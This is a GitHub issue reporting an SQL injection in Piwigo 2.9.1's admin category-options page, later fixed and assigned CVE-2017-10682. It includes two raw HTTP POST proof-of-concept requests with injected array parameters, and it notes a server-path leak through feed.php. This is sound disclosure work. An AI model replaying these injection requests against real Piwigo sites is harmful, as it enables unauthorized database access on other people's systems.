Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Bug Report: SQL injection in page cat_options #724

Closed
Akityo opened this issue Jun 29, 2017 · 4 comments
Closed

Bug Report: SQL injection in page cat_options #724

Akityo opened this issue Jun 29, 2017 · 4 comments
Assignees
Milestone

Comments

@Akityo
Copy link

Akityo commented Jun 29, 2017

Proof-of-Concent

version:2.9.1

section status

POST /piwigo/admin.php?page=cat_options&section=status HTTP/1.1
Host: www.test.com
Content-Length: 34
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.test.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.test.com/piwigo/admin.php?page=cat_options&section=status
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: pwg_id=4elnfc2n8r49dpl10dna2t3080
Connection: close

cat_false%5B%5D=755&trueify=%C2%AB

image

image

section commnets

POST /piwigo/admin.php?page=cat_options&section=comments HTTP/1.1
Host: www.test.com
Content-Length: 33
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.test.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.test.com/piwigo/admin.php?page=cat_options&section=comments
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: pwg_id=4elnfc2n8r49dpl10dna2t3080
Connection: close

cat_true%5B%5D=7*55&falsify=%C2%BB

image

Report By Topsec(Li Zhiqiang)

@flop25
Copy link
Member

flop25 commented Jun 29, 2017

Thank you you are still not using of the contact form or emails :/

@Akityo
Copy link
Author

Akityo commented Jun 29, 2017

@flop25 sorry for that and this one probably the last one bug report to piwigo :(
I just want CVE Assignment Team to know the details ,and they will verify this issue whether a bug or no't.
because there also an argument about a bug or no't a bug between Security researcher and Programmer.

In addition there is a infomation leak about system root path when requesting URL:
http://piwigo.org/demo/feed.php?feed=*
check_input_parameter /home/sys/var/www/piwigo.org/demo/feed.php(64)

flop25 added a commit that referenced this issue Jun 29, 2017
@flop25 flop25 closed this as completed Jun 29, 2017
@flop25 flop25 self-assigned this Jun 29, 2017
@flop25 flop25 added this to the 2.9.2 milestone Jun 29, 2017
@fgeek
Copy link

fgeek commented Jul 1, 2017

CVE-2017-10682 has been assigned for this issue.

plegall added a commit that referenced this issue Jul 3, 2017
@fgeek
Copy link

fgeek commented Oct 7, 2017

@Akityo You can request CVEs without publishing the details in public issue tracker. You can use https://cveform.mitre.org/ and reveal only the needed details. The CVE description can be updated after the CVE assigment if the issue is so critical that you don't want to reveal the info to MITRE before fix. If you need any help or more information feel free to contact me.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

3 participants